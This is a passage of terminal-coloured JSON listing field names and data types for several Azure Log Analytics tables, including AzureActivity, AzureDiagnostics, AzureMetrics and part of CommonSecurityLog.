\u001b[94m\"CloudServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CloudServiceRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CoolDown\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DefaultInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeploymentSlot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EstimateScaleResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceUpdateReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MaximumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"MetricData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricNamespace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricTimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinimumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ObservedValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Profile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileEvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileSelected\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Projection\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SelectedAutoscaleProfile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServerFarm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShouldUpdateInstance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipCurrentAutoscaleEvaluation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipRuleEvaluationForCooldown\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Threshold\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeAggregationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrainStatistic\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Webspace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleScaleActionsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJob\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureDiagnostics\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_schema_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_actionTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"endTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"error_code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"error_message_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_actionName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_location_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_originRunId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_resourceGroupName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_runId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_subscriptionId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_triggerName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"startTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"status_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tags_LogicAppsCategory_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"workflowId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureMetrics\"\u001b[39;49;00m: {\n        \u001b[94m\"Average\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Count\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Maximum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Minimum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Total\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UnitName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"CommonSecurityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalExtensions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationProtocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommunicationDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceEventClassID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceExternalID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceFacility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceInboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceMacAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceNtDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceOutboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DevicePayloadId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceProduct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTimeZone\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVendor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        